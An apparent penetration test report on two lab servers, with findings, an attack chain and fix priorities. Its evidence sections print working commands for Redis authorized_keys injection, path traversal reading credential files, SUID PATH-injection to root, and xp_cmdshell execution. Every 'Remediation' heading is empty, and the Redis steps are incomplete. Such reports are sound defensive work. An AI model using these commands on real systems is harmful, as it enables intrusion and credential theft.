Penetration Test Report

Client
Internal Lab Environment
Scope
192.168.1.101, 192.168.1.102
Test Period
2026-05-12
Test Type
Black-box / Internal
Report Date
2026-05-12
Version
v1.0 Confidential

Executive Summary

This penetration test assessed two internal servers — a Linux web server (192.168.1.101) and a Windows database server (192.168.1.102). Testing identified 8 security vulnerabilities:

3
Critical
2
High
2
Medium
1
Low

The most severe finding is Redis Unauthenticated Access (F-001), which allowed an attacker to gain direct SSH access to the web server without any credentials. Combined with a misconfigured SUID binary and credential reuse between systems, an attacker achieved full administrative control over both servers.

The complete attack chain: unauthenticated Redis → SSH shell → path traversal to read credentials → MSSQL SA access → credential reuse → Windows admin. No credentials were required to begin this chain.

Key Recommendations

  1. Immediately require authentication on Redis and bind to localhost (F-001)
  2. Patch WordPress Backup Migration plugin to v1.3.8+ (F-002)
  3. Fix path traversal in Express API file endpoint (F-003)
  4. Rotate ALL exposed credentials, enforce unique passwords per service (F-004, F-007)

Scope

CategoryDetail
In-Scope192.168.1.101 (websrv01.corpnet.local) — Linux web server
192.168.1.102 (dbsrv01.corpnet.local) — Windows database server
Out-of-ScopeOther hosts on 192.168.1.0/24; AD domain controller (if separate)
ConstraintsFull testing authorized, deep depth, exploitation approved

Vulnerability Summary

IDVulnerabilityRiskAffected AssetCVSS
F-001Redis Unauthenticated AccessCritical192.168.1.101:63799.8
F-002WordPress Plugin RCE (CVE-2023-6553)Critical192.168.1.101:809.8
F-003API Path TraversalCritical192.168.1.101:80809.1
F-004MSSQL SA Weak PasswordHigh192.168.1.102:14338.1
F-005SUID Binary Privilege EscalationHigh192.168.1.101 (local)7.8
F-006SMB Signing DisabledMedium192.168.1.102:4455.3
F-007Cross-Service Credential ReuseMedium192.168.1.1026.5
F-008WordPress Weak Admin PasswordLow192.168.1.101:803.1

Attack Chain

1
Redis no-auth (F-001) — Connected without credentials, injected SSH public key via CONFIG SET, gained shell as redis user on 192.168.1.101
2
SUID path injection (F-005) — Exploited /usr/local/bin/backup_tool which calls system("tar ...") without absolute path. Escalated to root on 192.168.1.101
3
Path traversal (F-003) — Read /opt/app/config.json via /api/v1/files/../../../../opt/app/config.json, obtaining MSSQL SA credentials
4
MSSQL xp_cmdshell (F-004) — Logged in as SA with discovered password, enabled xp_cmdshell, gained shell as nt service\mssqlserver on 192.168.1.102
5
Credential reuse (F-007)CORPNET\sqlsvc shares the SA password. WinRM access with local admin privileges on 192.168.1.102
6
Secret extraction — Used impacket-secretsdump to extract SAM hashes, LSA Secrets, and cached domain credentials from 192.168.1.102

Vulnerability Details

F-001 Redis Unauthenticated Access Critical
Location: 192.168.1.101:6379
CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-306
Type: Missing Authentication

The Redis instance requires no authentication and is bound to all interfaces. The CONFIG command is unrestricted, allowing arbitrary filesystem writes — including SSH authorized_keys injection.

Evidence

$ redis-cli -h 192.168.1.101 ping
PONG
$ redis-cli -h 192.168.1.101 CONFIG GET requirepass
1) "requirepass"
2) ""
$ redis-cli -h 192.168.1.101 CONFIG SET dir /var/lib/redis/.ssh
OK
$ redis-cli -h 192.168.1.101 CONFIG SET dbfilename authorized_keys
OK
$ ssh -i pentest_key redis@192.168.1.101 id
uid=110(redis) gid=115(redis) groups=115(redis)

Remediation

F-002 WordPress Plugin RCE — CVE-2023-6553 Critical
Location: 192.168.1.101:80 (backup-migration v1.3.7)
CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-94
Type: Unauthenticated Remote Code Execution

The Backup Migration plugin v1.3.7 allows unauthenticated PHP code injection. An attacker can execute arbitrary code on the server without any credentials.

Evidence

$ wpscan --url http://192.168.1.101 --enumerate ap
[+] backup-migration
 | Version: 1.3.7
 | [!] Title: Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
 | Fixed in: 1.3.8
 | References:
 |  - https://nvd.nist.gov/vuln/detail/CVE-2023-6553

Remediation

F-003 API Path Traversal — Arbitrary File Read Critical
Location: GET http://192.168.1.101:8080/api/v1/files/{filename}
CVSS: 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE: CWE-22
Type: Path Traversal

The Express API file endpoint does not sanitize path parameters. Directory traversal sequences read arbitrary files, including credentials that enabled lateral movement to the Windows server.

Evidence

$ curl -s --path-as-is http://192.168.1.101:8080/api/v1/files/../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
...

$ curl -s --path-as-is http://192.168.1.101:8080/api/v1/files/../../../../opt/app/config.json
{"mssql_mirror":{"host":"192.168.1.102","user":"sa","password":"SQLServer2024!"}}

Remediation

F-004 MSSQL SA Weak Password High
Location: 192.168.1.102:1433
CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
CWE: CWE-521
Type: Weak Password

The MSSQL SA account uses a predictable password found in plaintext configuration. SA has sysadmin privileges enabling OS command execution via xp_cmdshell.

Evidence

$ impacket-mssqlclient sa:'SQLServer2024!'@192.168.1.102
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
          1
SQL> EXEC xp_cmdshell 'whoami'
nt service\mssqlserver

Remediation

F-005 SUID Binary Privilege Escalation High
Location: 192.168.1.101:/usr/local/bin/backup_tool
CVSS: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-426
Type: Untrusted Search Path

A custom SUID root binary calls system("tar ...") without an absolute path, enabling PATH injection to execute arbitrary commands as root.

Evidence

$ strings /usr/local/bin/backup_tool | grep tar
tar -czf /tmp/backup.tar.gz %s
$ echo '#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > /tmp/tar
$ chmod +x /tmp/tar && PATH=/tmp:$PATH /usr/local/bin/backup_tool /etc/hosts
$ /tmp/rootbash -p -c "id"
uid=110(redis) gid=115(redis) euid=0(root) egid=0(root)

Remediation

F-006 SMB Signing Disabled Medium
Location: 192.168.1.102:445
CVSS: 5.3 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE: CWE-311
Type: Insecure Protocol Configuration

SMB signing is not required, enabling NTLM relay attacks.

Evidence

$ nxc smb 192.168.1.102
SMB  192.168.1.102  445  DBSRV01  [*] (signing:False)

Remediation

F-007 Cross-Service Credential Reuse Medium
Location: 192.168.1.102 (MSSQL ↔ WinRM)
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE: CWE-255
Type: Credential Reuse

CORPNET\sqlsvc uses the same password as MSSQL SA. WinRM access with local admin privileges.

Evidence

$ nxc winrm 192.168.1.102 -u 'sqlsvc' -p 'SQLServer2024!'
WINRM  192.168.1.102  5985  DBSRV01  [+] CORPNET\sqlsvc:SQLServer2024! (Pwn3d!)

Remediation

F-008 WordPress Weak Admin Password Low
Location: http://192.168.1.101/wp-login.php
CVSS: 3.1 (AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N)
CWE: CWE-521
Type: Weak Password

The WordPress admin account uses admin123, cracked within the top 10,000 common passwords via XML-RPC brute-force.

Remediation

Negative Results

ServiceTestResult
SSH (.101)Weak ciphers, default credentialsModern config, no default creds
FTP (.101)Sensitive files, writable directoriesAnonymous read only, no sensitive files
MySQL (.101)Remote accessACL properly restricts to localhost
PostgreSQL (.101)Remote accesspg_hba.conf properly restricts
DNS (.102)Zone transferProperly denied
SNMP (.101, .102)Community string brute-forceNot accessible
RDP (.102)Weak encryption, NLA bypassNLA enabled, encryption adequate
SSL/TLS (.101)Known vulnerabilitiesNo HEARTBLEED, POODLE, ROBOT, etc.
IIS (.102:8443)Default credentials, traversalLogin required, no findings

Remediation Priority

PriorityFindingEffortImpact
1 (Immediate)F-001: Redis auth + bind localhostLow (config change)Blocks entire attack chain entry point
2 (Immediate)F-003: Fix API path traversalLow (code fix)Prevents credential exposure → blocks lateral movement
3 (Immediate)F-002: Update WP pluginLow (plugin update)Eliminates unauthenticated RCE
4 (This week)F-004 + F-007: Rotate all credentialsMediumInvalidates all discovered credentials, breaks reuse
5 (This week)F-005: Fix SUID binaryLow (recompile)Prevents privilege escalation
6 (This month)F-006: Enable SMB signingMedium (GPO)Prevents relay attacks
7 (This month)F-008: WP password policyLowPrevents brute-force access

Tools Used

ToolVersionPurpose
nmap7.94Port scanning, service detection, NSE scripts
arp-scan1.10.0ARP-based host discovery
redis-cli7.0.15Redis interaction and exploitation
nuclei3.2.0Template-based vulnerability scanning
nikto2.5.0Web server vulnerability scanning
testssl.sh3.2SSL/TLS security audit
whatweb0.5.5Web technology fingerprinting
wafw00f2.2.0WAF detection
ffuf2.1.0Directory/API endpoint discovery
wpscan3.8.25WordPress vulnerability scanning
enum4linux-ng1.3.0SMB/NetBIOS enumeration
smbmap1.10.2SMB share permission enumeration
netexec (nxc)1.1.0Multi-protocol credential testing
impacket0.12.0Windows protocol exploitation
evil-winrm3.5WinRM shell access
onesixtyone0.3.4SNMP community string brute-force

This penetration test was conducted under an authorization agreement. All testing activities were performed within the agreed scope. Testing artifacts were removed during the cleanup phase.

Report generated 2026-05-12 • Confidential